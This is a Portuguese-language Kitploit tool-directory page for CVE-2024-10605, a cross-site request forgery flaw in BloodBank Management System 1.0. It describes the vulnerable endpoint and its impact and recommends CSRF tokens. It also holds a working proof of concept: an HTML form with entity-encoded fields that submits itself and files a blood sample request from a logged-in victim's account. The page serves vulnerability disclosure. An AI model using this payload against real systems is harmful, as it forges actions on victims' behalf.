Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10605 — Exploit de prova de conceito para uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no BloodBank Management System 1.0, permitindo solicitações não autorizadas de amostras de sangue através de um formulário HTML malicioso. | Kitploit
Ferramentas/GitHubGitHub/bevennyamande/cve-2024-10605
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

Exploit de prova de conceito para uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no BloodBank Management System 1.0, permitindo solicitações não autorizadas de amostras de sangue através de um formulário HTML malicioso.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

Versão Afetada:

  • Sistema de Gerenciamento de Banco de Sangue: 1.0

Informações da Vulnerabilidade:

  • Tipo de Vulnerabilidade: Cross Site Request Forgery (CSRF)
  • Severidade: ALTA
  • Status: Não corrigida

Endpoint Vulnerável:

  • Caminho: file/request.php

Descrição da Vulnerabilidade:

Existe uma Cross Site Request Forgery neste endpoint /file/request.php que permite a um usuário remoto iniciar uma solicitação de amostra de sangue na conta de um receptor que está logado, a partir da amostra de sangue disponível de um hospital selecionado.

A exploração bem-sucedida pode levar a ações não autorizadas em nome da vítima. Além disso, isso pode ser explorado ao visitar sites maliciosos com o payload.


Prova de Conceito (PoC):

Abaixo está um exemplo de um Ataque CSRF PoC que inicia uma solicitação de amostra de sangue a partir da conta de um receptor logado:

root@kitploit:~

<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






Impacto:

  • Manipulação de Dados: Atacantes poderiam modificar o conteúdo exibido aos usuários.
  • Danos à Reputação: Os usuários podem perder a confiança no sistema devido a comportamento malicioso.

Recomendações de Mitigação:

  1. Use Token CSRF Implemente um mecanismo para impedir acesso entre domínios ou coloque csrf tokens em sua solicitação.

Baixar ferramenta